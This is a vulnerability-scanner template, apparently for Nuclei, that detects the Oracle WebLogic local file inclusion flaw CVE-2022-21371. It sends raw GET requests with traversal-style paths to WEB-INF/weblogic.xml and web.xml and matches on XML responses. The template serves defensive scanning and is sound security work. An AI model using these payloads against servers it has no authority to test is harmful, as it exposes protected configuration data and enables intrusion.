id: CVE-2022-21371

info:
  name: Oracle WebLogic Server Local File Inclusion
  author: paradessia,narluin
  severity: high
  description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.
  reference:
    - https://www.oracle.com/security-alerts/cpujan2022.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-21371
    - https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2022-21371
  tags: cve,cve2022,lfi,weblogic,oracle

requests:
  - method: GET
    raw:
      - |+
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - .//WEB-INF/weblogic.xml
        - .//WEB-INF/web.xml

    unsafe: true
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<web-app") && contains(body, "</web-app>")'
          - 'contains(body, "<weblogic-web-app") && contains(body, "</weblogic-web-app>")'
        condition: or

      - type: dsl
        dsl:
          - 'contains(all_headers, "text/xml")'
          - 'contains(all_headers, "application/xml")'
        condition: or

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/03/08